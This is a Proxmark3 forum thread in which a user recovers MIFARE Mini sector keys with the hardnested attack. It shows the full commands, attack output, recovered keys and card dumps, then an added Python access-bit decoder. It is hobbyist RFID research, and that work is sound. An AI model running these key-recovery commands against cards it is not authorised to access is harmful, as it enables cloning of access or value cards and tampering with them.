Research, development and trades concerning the powerful Proxmark3 device.
It's been a long time since I last worked on RFID,
please give me some help to put me back on the right track:
I use PM3 with the Automatic Mifare crack Script.
The script works fine with the old card but it doesn't work with the new one.
old one: NXP MIFARE Classic 1k / MIFARE Plus (4-byte UID) 2K SL1 (ATQA=0004, SAK=08)
new one: NXP MIFARE Mini (ATQA=0004, SAK=09)
Is there an attack for this tag?
note1: I can't physically sniff between the reader and the tag
note2: my current loaded version of PM3 firmware is old.
Oh my, Gaucho, now that was a long time indeed. Welcome back! I'm happy to see you here.
You need to read up on what's called the hardnested attack, which is the attack that works against a Mifare Classic tag which has an improved PRNG and no ACK bug.
You find it implemented in the latest source. compile/flash and enjoy the enhancements.
You also find a new repo based on your old PM3Gui. Feel free to do your magic
Thank you Roel, I will try it and I will give a feedback
haha, no, sorry, I'm not Roel...
but I became admin
oh! Ciao Iceman, nice to meet you again.
Sorry, I read "Administrator" and I didn't read "iceman"; I'm becoming old and dumb.
welcome back gaucho
Ciao marshmellow, nice to see you too.
I downloaded the compiled version from this thread: http://www.proxmark.org/forum/viewtopic.php?id=3975
I selected last official version in the Google drive folder.
I had some problems updating with the fullimage. I had to boot a few times with the button pressed, then installed the old working version, then installed the bootloader of the new version, then installed the fullimage.
Finally it seems correctly updated!
I found on github this: https://github.com/Proxmark/Gaucho-GUI
the strange fact is that in my local folder I have another version of the tool developed in vb.net with a more updated xml configuration file.
Where is the updated xml file located? on github I see an empty xml file
If you don't have it, could we take my old one and start from it in order to update it? Where is the thread about this discussion?
I tried the hardnested attack.
I get the following, but maybe I didn't understand how to use it.
proxmark3> hf mf hardnested 0 A A0A1A2A3A4A5 50 B w s
--target block no: 50, target key type:B, known target key: 0x000000000000 (not set), file action: write, Slow: Yes, Tests: 0
time | #nonces | Activity | expected to brute force
| | | #states | time
------------------------------------------------------------------------------------------------------
0 | 0 | Start using 4 threads and AVX SIMD core | |
0 | 0 | Brute force benchmark: 249 million (2^27.9) keys/s | 140737488355328 | 7d
2 | 0 | Using 235 precalculated bitflip state tables | 140737488355328 | 7d
#db# AcquireNonces: Can't select card (UID)
#db# AcquireNonces: Can't select card (UID)
6 | 0 | Writing acquired nonces to binary file nonces.bin | 140737488355328 | 7d
7 | 112 | Apply bit flip properties | 616831057920 | 41min
8 | 223 | Apply bit flip properties | 304204513280 | 20min
#db# AcquireNonces: Can't select card (UID)
9 | 334 | Apply bit flip properties | 118500147200 | 8min
#db# AcquireNonces: Auth2 error len=1
#db# AcquireNonces: Can't select card (UID)
11 | 445 | Apply bit flip properties | 90291929088 | 6min
12 | 555 | Apply bit flip properties | 45307748352 | 3min
13 | 666 | Apply bit flip properties | 45307748352 | 3min
14 | 776 | Apply bit flip properties | 45307748352 | 3min
#db# AcquireNonces: Can't select card (ALL)
#db# Authentication failed. Card timeout.
#db# AcquireNonces: Auth1 error
15 | 885 | Apply bit flip properties | 20603797504 | 83s
16 | 995 | Apply bit flip properties | 20603797504 | 83s
17 | 1104 | Apply bit flip properties | 20603797504 | 83s
21 | 1213 | Apply Sum property. Sum(a0) = 120 | 2457400832 | 10s
22 | 1324 | Apply bit flip properties | 2457400832 | 10s
#db# Authentication failed. Card timeout.
#db# AcquireNonces: Auth1 error
24 | 1435 | Apply bit flip properties | 2457400832 | 10s
#db# AcquireNonces: Can't select card (UID)
25 | 1543 | Apply bit flip properties | 2457400832 | 10s
25 | 1543 | (Ignoring Sum(a8) properties) | 2457400832 | 10s
30 | 1543 | Starting brute force... | 2457400832 | 10s
41 | 1543 | Brute force phase completed. Key found: d01afeeb890a | 0 | 0s
NOTE1: the found key is not usable to read block 50
NOTE2: I tried to use key A A0A1A2A3A4A5 to read block 0 but I get an authentication error. I think they changed the default password to read block 0. Is it possible? I understood that the hardnested attack works only if you know at least one key. Correct?
Regarding the Gaucho-GUI, this is the new repo, which is to use C# instead of VB.NET. It is different from yours; the settings.xml is now called pm3commands.xml: https://github.com/Proxmark/Gaucho-GUI/ … mmands.xml
The project is quite stale but uses your original ideas.
Regarding hardnested,
It needs one known key to work, and maybe the access rights are not right for the found key to work?
Regarding hardnested,
It needs one known key to work, and maybe the access rights are not right for the found key to work?
sorry, I was wrong: block 0 can be correctly read with password a0a1a2a3a4a5
so, how would you proceed for this exploit?
Did I understand the usage correctly? If I know key A of block 0 and I want key B of block 50, I should use the following command:
hf mf hardnested 0 A A0A1A2A3A4A5 50 B w s
P.S. off topic: the xml on GitHub is almost empty, while the last xml file prepared by asper is much more complete, as you can see in the attached file: tool+xml
Last edited by gaucho (2017-09-26 14:43:08)
The Gaucho repo is set up, but only 0xFFFF did some additions. It was supposed to bring order to the zip files with your original source code floating around on the internet. So yes, the pm3commands.xml needs to be filled with data. Feel free to contribute.
The hardnested is called the way you did.
hf mf hardnested 0 A A0A1A2A3A4A5 50 B
you can add the 's' - slow parameter if you need it. You don't need 'w'
The attack worked for you, but KEY B might not be allowed to r/w the block/sector.
I'm not sure what you mean with "proceed for this exploit"...
You will do same as for all Mifare classic cards. Get all keys (both A/B) dump the card, ... you know, usual stuff
The attack worked for you, but KEY B might not be allowed to r/w the block/sector.
OK, I corrected the previous post: the key for block 0 is a0a1a2a3a4a5 and it works, while the found key for block 50 (A and B) does not allow reading the data. This is strange because on the old tag block 50 can be written... I could try with other blocks...
proxmark3> hf mf hardnested 0 A a0a1a2a3a4a5 50 A w s
--target block no: 50, target key type:A, known target key: 0x000000000000 (not set), file action: write, Slow: Yes, Tests: 0
time | #nonces | Activity | expected to brute force
| | | #states | time
------------------------------------------------------------------------------------------------------
0 | 0 | Start using 4 threads and AVX SIMD core | |
0 | 0 | Brute force benchmark: 164 million (2^27.3) keys/s | 140737488355328 | 10d
7 | 0 | Using 235 precalculated bitflip state tables | 140737488355328 | 10d
12 | 0 | Writing acquired nonces to binary file nonces.bin | 140737488355328 | 10d
#db# AcquireNonces: Can't select card (UID)
13 | 112 | Apply bit flip properties | 362125426688 | 37min
14 | 224 | Apply bit flip properties | 342383001600 | 35min
15 | 336 | Apply bit flip properties | 231093567488 | 24min
16 | 448 | Apply bit flip properties | 117451595776 | 12min
#db# AcquireNonces: Can't select card (UID)
17 | 559 | Apply bit flip properties | 86514655232 | 9min
18 | 670 | Apply bit flip properties | 81467498496 | 8min
20 | 781 | Apply bit flip properties | 59585695744 | 6min
21 | 891 | Apply bit flip properties | 56696315904 | 6min
22 | 1000 | Apply bit flip properties | 56696315904 | 6min
#db# Authentication failed. Error card response.
#db# AcquireNonces: Auth1 error
#db# AcquireNonces: Can't select card (UID)
#db# AcquireNonces: Auth2 error len=1
#db# AcquireNonces: Can't select card (UID)
23 | 1111 | Apply bit flip properties | 41825263616 | 4min
24 | 1221 | Apply bit flip properties | 41825263616 | 4min
#db# Authentication failed. Error card response.
#db# AcquireNonces: Auth1 error
#db# AcquireNonces: Can't select card (UID)
25 | 1330 | Apply bit flip properties | 39939891200 | 4min
30 | 1439 | Apply Sum property. Sum(a0) = 128 | 10160185344 | 62s
33 | 1550 | Apply bit flip properties | 10160185344 | 62s
37 | 1658 | Apply bit flip properties | 5059532800 | 31s
#db# AcquireNonces: Auth1 error
#db# AcquireNonces: Can't select card (UID)
#db# Authentication failed. Error card response.
#db# AcquireNonces: Auth1 error
#db# AcquireNonces: Can't select card (UID)
40 | 1766 | Apply bit flip properties | 5059532800 | 31s
42 | 1874 | Apply bit flip properties | 5059532800 | 31s
45 | 1981 | Apply bit flip properties | 4719508480 | 29s
45 | 1981 | (Ignoring Sum(a8) properties) | 4719508480 | 29s
#db# AcquireNonces: Auth1 error
#db# AcquireNonces: Can't select card (UID)
51 | 1981 | Starting brute force... | 4719508480 | 29s
114 | 1981 | Brute force phase completed. Key found: 5c8ff9990da2 | 0 | 0s
Last edited by gaucho (2017-09-26 14:48:51)
try block 51 and see if you get the same key? You should of course..
update:
I can read only the first 5 blocks, while block 5 cannot be read even if the key should be a0a1a2a3a4a5
8E7F48FF46890400C840002000000015
A5000938093809380938000500050005
00050005000500050005000500050005
00000000000061E789C1000000000000
8805D882000485220000030002051979
I should find on my hard disk the datasheet where the memory structure is defined, in order to check the write permissions
try block 51 and see if you get the same key? You should of course..
yes, key A for block 51 is the same as for block 50.
Which command do you use to read with that key?
Which command do you use to read with that key?
I'm using another reader, an SL500.
for the access bits decoding I will use this tool : http://www.proxmark.org/forum/viewtopic.php?id=1408
Last edited by gaucho (2017-09-26 15:44:26)
Why don't you use the proxmark3 to read the block50 with that key B?
OK, it seems to be a matter of write permissions.
with key a0a1a2a3a4a5 I can read the following blocks:
0 8E7F48FF46890400C840002000000015
1 A5000938093809380938000500050005
2 00050005000500050005000500050005
3 00000000000061E789C1000000000000
4 8805D882000485220000030002051979
5
6
7 0000000000001E11EE5A000000000000
8
9
10
11 0000000000000F00FF7A000000000000
12
13
14
15 0000000000000F00FFDD000000000000
16
17
18
19 0000000000004B44BB5A000000000000
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
I tried to read block 51 with Keys obtained with the hardnested attack without success.
Why don't you use the proxmark3 to read the block50 with that key B?
I did it, I get the same result:
proxmark3> hf 14a reader
UID : 8e 7f 48 ff
ATQA : 00 04
SAK : 09 [2]
TYPE : NXP MIFARE Mini 0.3k
proprietary non iso14443-4 card found, RATS not supported
Answers to chinese magic backdoor commands: NO
proxmark3> hf mf rdbl 50 B d01afeeb890a
--block no:50, key type:B, key:d0 1a fe eb 89 0a
#db# Cmd Error: 04
#db# Read block error
#db# READ BLOCK FINISHED
isOk:00
proxmark3> hf mf rdbl 51 B d01afeeb890a
--block no:51, key type:B, key:d0 1a fe eb 89 0a
#db# Cmd Error: 04
#db# Read block error
#db# READ BLOCK FINISHED
isOk:00
proxmark3> hf mf rdbl 52 B d01afeeb890a
--block no:52, key type:B, key:d0 1a fe eb 89 0a
#db# Cmd Error: 04
#db# Read block error
#db# READ BLOCK FINISHED
isOk:00
proxmark3> hf mf rdbl 49 B d01afeeb890a
--block no:49, key type:B, key:d0 1a fe eb 89 0a
#db# Cmd Error: 04
#db# Read block error
#db# READ BLOCK FINISHED
isOk:00
proxmark3>
Does the access bits calculator say KEY B should be able to R/W block 50?
Lets see:
block 50
A == 5c8ff9990da2
B == d01afeeb890a
hf mf rdbl 52 A 5c8ff9990da2
hf mf rdbl 52 B d01afeeb890a
Does the access bits calculator say KEY B should be able to R/W block 50?
Lets see:
block 50
A == 5c8ff9990da2
B == d01afeeb890a
hf mf rdbl 52 A 5c8ff9990da2
hf mf rdbl 52 B d01afeeb890a
Access bits for block 50 should be on block 51. Do you agree?
I tried to read block 51 without success.
I don't know how to proceed.
I suspect I miss something
I may be nuts, but if your card is a mifare mini it only has 20 blocks...
I may be nuts, but if your card is a mifare mini it only has 20 blocks...
This makes sense.
Maybe the reader uses two different approaches depending on the key that it finds. In one case (Mifare 1k) it writes block 50 and in another case (Mifare Mini) it writes block xxx (<20)
Are we sure Mifare Mini has only 20 blocks?
Edit: yes, http://www.orangetags.com/rfid-chip-datasheet/nxp-rfid-chip-datasheet/mifare/mifare-mini-datasheet/
Last edited by gaucho (2017-09-26 18:30:32)
Yep. 320 bytes, 5 sectors, 20 blocks.
Is there a script like the autopwn to get all the keys with the hardnested attack?
It's funny that the brute force also finds a key for a nonexistent block. It's something related to Chuck Norris
Doesn't make sense...
hardnested shouldn't be able to gather nonces against a non-existent block.
so, the card you have attacked must have had a block 50.
The Mini is, as stated, only 5 sectors (20 blocks), which is why your reads of blocks 50, 51 fail majorly... All normal now.
your reads of the individual blocks should succeed up to block 19 (zero-based), all normal.
The found keys, try them against your sectors..
hf mf rdsc 0 a 5c8ff9990da2
hf mf rdsc 1 a 5c8ff9990da2
hf mf rdsc 2 a 5c8ff9990da2
hf mf rdsc 3 a 5c8ff9990da2
hf mf rdsc 4 a 5c8ff9990da2
There are some unreleased scripts which make hardnested behave like the nested...
Welcome back, Gaucho!
Idea: Mifare Mini uses only 5 bits for block addressing, i.e. block 50 = block 18? Or your card isn't a Mifare Mini...
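Added example (mine, not code from the thread or from the Proxmark3 project) that does what the "access bits calculator" post above asks for: it decodes the C1/C2/C3 access bits from the sector trailers gaucho dumped with key A (blocks 3, 7, 11, 15, 19), checks the inverted-nibble parity the card enforces, validates the BCC in block 0, maps block numbers to sectors and trailers for the Mini (20 blocks), 1K and 4K layouts, and carries out the "5-bit address" idea above as arithmetic (50 & 0x1F = 18). Function names, LAYOUTS, and alias_block() are my assumptions; the aliasing is only the hypothesis raised in the thread, not something the page confirms. Decoding the posted trailers shows that sector 1 (trailer at block 7) marks block 4 as "100" (readable with A or B) and blocks 5 and 6 as "011" (readable with key B only), which is exactly why only block 4 of that sector came back with a0a1a2a3a4a5; sectors 2 and 3 are "011" throughout. Sector 4's trailer marks block 18 as readable with either key, yet it came back empty, so that sector presumably uses other keys.

```python
"""MIFARE Classic access-bit decoder plus Mini / 1K / 4K layout helpers.

Added example written for this thread, not Proxmark3 client code. The
trailer and block-0 contents in DUMP are copied from the key-A dump
posted above; function names and alias_block() are assumptions.
"""

# C1C2C3 -> (read, write, increment, decrement/transfer/restore) for a data block
DATA_BLOCK_ACL = {
    "000": ("A|B", "A|B", "A|B", "A|B"),
    "010": ("A|B", "never", "never", "never"),
    "100": ("A|B", "B", "never", "never"),
    "110": ("A|B", "B", "B", "A|B"),
    "001": ("A|B", "never", "never", "A|B"),
    "011": ("B", "B", "never", "never"),
    "101": ("B", "never", "never", "never"),
    "111": ("never", "never", "never", "never"),
}
# C1C2C3 -> (keyA read, keyA write, bits read, bits write, keyB read, keyB write)
TRAILER_ACL = {
    "000": ("never", "A", "A", "never", "A", "A"),
    "010": ("never", "never", "A", "never", "A", "never"),
    "100": ("never", "B", "A|B", "never", "never", "B"),
    "110": ("never", "never", "A|B", "never", "never", "never"),
    "001": ("never", "A", "A", "A", "A", "A"),
    "011": ("never", "B", "A|B", "B", "never", "B"),
    "101": ("never", "never", "A|B", "B", "never", "never"),
    "111": ("never", "never", "A|B", "never", "never", "never"),
}
# Total blocks per chip; the Mini is 5 sectors x 4 blocks = 320 bytes.
LAYOUTS = {"mini": 20, "1k": 64, "4k": 256}


def decode_access_bits(trailer_hex):
    """Return ([C1C2C3 for block 0, 1, 2, trailer], parity_ok) for a 16-byte trailer."""
    t = bytes.fromhex(trailer_hex)
    if len(t) != 16:
        raise ValueError("a sector trailer is 16 bytes")
    b6, b7, b8 = t[6], t[7], t[8]
    # Byte layout: b6 = ~C2 | ~C1, b7 = C1 | ~C3, b8 = C3 | C2 (high nibble | low nibble).
    c1, c2, c3 = b7 >> 4, b8 & 0x0F, b8 >> 4
    # The inverted copies must match; a genuine card treats a mismatch as a dead sector.
    parity_ok = ((b6 & 0x0F) == (~c1 & 0x0F)
                 and (b6 >> 4) == (~c2 & 0x0F)
                 and (b7 & 0x0F) == (~c3 & 0x0F))
    # Bit i of each nibble belongs to block i of the sector (bit 3 = the trailer).
    conds = [f"{(c1 >> i) & 1}{(c2 >> i) & 1}{(c3 >> i) & 1}" for i in range(4)]
    return conds, parity_ok


def readable_with(trailer_hex):
    """Which key may read each of the sector's three data blocks."""
    conds, ok = decode_access_bits(trailer_hex)
    if not ok:
        raise ValueError("access-bit parity check failed")
    return [DATA_BLOCK_ACL[c][0] for c in conds[:3]]


def sector_of_block(block, layout="1k"):
    """Sector containing `block`; raises for addresses the chip does not have."""
    nblocks = LAYOUTS[layout]
    if not 0 <= block < nblocks:
        raise ValueError(f"block {block} does not exist on a {layout} ({nblocks} blocks)")
    # 4K cards switch to 16-block sectors from block 128 (sector 32) onwards.
    return block // 4 if block < 128 else 32 + (block - 128) // 16


def trailer_block(block, layout="1k"):
    """Address of the trailer holding the access bits for `block`."""
    s = sector_of_block(block, layout)
    return s * 4 + 3 if s < 32 else 128 + (s - 32) * 16 + 15


def check_bcc(block0_hex):
    """Block 0 of a 4-byte-UID card: UID[0..3] then BCC = XOR of the UID bytes."""
    b = bytes.fromhex(block0_hex)
    return b[4] == (b[0] ^ b[1] ^ b[2] ^ b[3])


def alias_block(block, addr_bits=5):
    """Assumption only: block a tag would see if it kept just the low addr_bits."""
    return block & ((1 << addr_bits) - 1)


# Copied from the dump above: block 0 and the five sector trailers read with key A.
DUMP = {
    0: "8E7F48FF46890400C840002000000015",
    3: "00000000000061E789C1000000000000",
    7: "0000000000001E11EE5A000000000000",
    11: "0000000000000F00FF7A000000000000",
    15: "0000000000000F00FFDD000000000000",
    19: "0000000000004B44BB5A000000000000",
}

if __name__ == "__main__":
    print("block 0 BCC ok:", check_bcc(DUMP[0]))
    for blk in (3, 7, 11, 15, 19):
        conds, ok = decode_access_bits(DUMP[blk])
        print(f"sector {sector_of_block(blk, 'mini')}: parity {'ok' if ok else 'BAD'},"
              f" data blocks readable by {readable_with(DUMP[blk])}, trailer {TRAILER_ACL[conds[3]]}")
    print("block 50 & 0x1F =", alias_block(50), "-> trailer", trailer_block(alias_block(50), "mini"))
```

Run it as-is to print the decoded conditions for every sector in the dump; pass a different layout name to sector_of_block() / trailer_block() to see that block 50 is sector 12 (trailer 51) on a 1K but raises on a Mini.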
...a wrong block read/write must respond with a NACK of sorts if following the Mifare Classic protocol, i.e. a genuine tag. But clones like Fudan etc. could be more tolerant with those...